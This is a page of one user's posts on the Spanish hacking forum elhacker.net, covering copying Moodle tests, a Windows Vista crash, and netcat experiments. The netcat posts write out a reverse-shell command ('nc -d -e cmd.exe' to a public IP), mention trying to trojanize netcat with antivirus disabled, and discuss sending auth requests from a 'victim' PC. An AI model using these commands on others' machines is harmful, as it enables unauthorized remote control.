elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7
1  Programación / Scripting / Copiar formulario moodle en: 20 Abril 2016, 16:21 pm
Muy buenas, no sé exactamente donde ponerlo, si no corresponde aquí cambiarlo a donde se conveniente.

Era para ver si alguien sabe como copiar un test de una plataforma moodle. Me han dicho que existe un programa que saca las preguntas y respuestas del html y las pasas a texto para luego poder importarlo a otro moodle, pero desconozco cual es, si alguien sabe... No sé si me he explicado bien...

Gracias de antemano
2  Seguridad Informática / Hacking / Re: Jugando con netcat en: 1 Julio 2011, 18:38 pm
Si claro que lo mapee...pero sigue sin funcionar....no se que puede ser
3  Seguridad Informática / Hacking / Re: Jugando con netcat en: 26 Junio 2011, 16:49 pm
Lo hago desde mi pc los 2 comandos.

En una ventana msdos pongo nc -vv -L -p 6000

En la otra nc -d -e cmd.exe miipPUBLICA 6000

Deberia conectar, no?

Si en cambio hago el mismo proceso pero en vez de ip publica, la ip privada(192.168.xxxx) si que conecta.

Por eso creo que aunque lo probara desde otro ordenador no conectaria el exterior a mi netcat a la escucha.


4  Seguridad Informática / Hacking / Re: Jugando con netcat en: 24 Junio 2011, 13:57 pm
ya consegui hacerlo, el problema es que no puedo hacer un reverse shell, tengo el firewall desactivado, firewall de router desactivado, y puerto 6000 abierto en router y no conecta desde exterior...:S

alguna sugerencia?
5  Seguridad Informática / Hacking / Re: Jugando con netcat en: 15 Junio 2011, 10:31 am
nada lo intente bajarlo otra vez con el av norton desactivado, y sigo teniendo el mismo problema :S
6  Seguridad Informática / Hacking / Re: Jugando con netcat en: 15 Junio 2011, 09:50 am
me pone que el archivo tiene un formato desconocido o esta dañado cuanco intento crearlo con el winrar. tengo av desactivado
7  Seguridad Informática / Hacking / Re: Jugando con netcat en: 14 Junio 2011, 21:32 pm
cuando intento troyanizar netcat con windows 7 no me deja el winrar. me da un error, a alguien más le ha pasado?
8  Sistemas Operativos / Windows / windows vista se apaga al descargar en: 26 Octubre 2010, 15:20 pm
Buenas, tengo un problema con windows vista, y es que cuando intento descargar un archivo de internet se me apaga automaticamente el pc, alguien sabe que puede ser? si algún virus o algo que haya configurado mal?

Gracias de antemano
9  Seguridad Informática / Hacking / Re: Posible hacer esto con NETCAT? en: 26 Noviembre 2009, 14:51 pm
Código:
# perl -MMIME::Base64 -le "print encode_base64(shift)" "username:password"
dXNlcm5hbWU6cGFzc3dvcmQ=

# cat basic_auth
GET / HTTP/1.0
Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=

# cat basic_auth | nc xx.xx.xx.xx 80
...


vale, todo este proceso debería hacerlo desde la shell de la victima, pero para eso necesita ese ordenador Perl
10  Seguridad Informática / Hacking / Re: Posible hacer esto con NETCAT? en: 26 Noviembre 2009, 14:25 pm
si la pass del router la se, de todas formas no podre hacerlo en un pc victima.


El nc ip 80 está claro que no funciona, entonces la única posibilidad es instalar el perl en el pc víctima por lo que veo, cierto?
Páginas: [1] 2 3 4 5 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines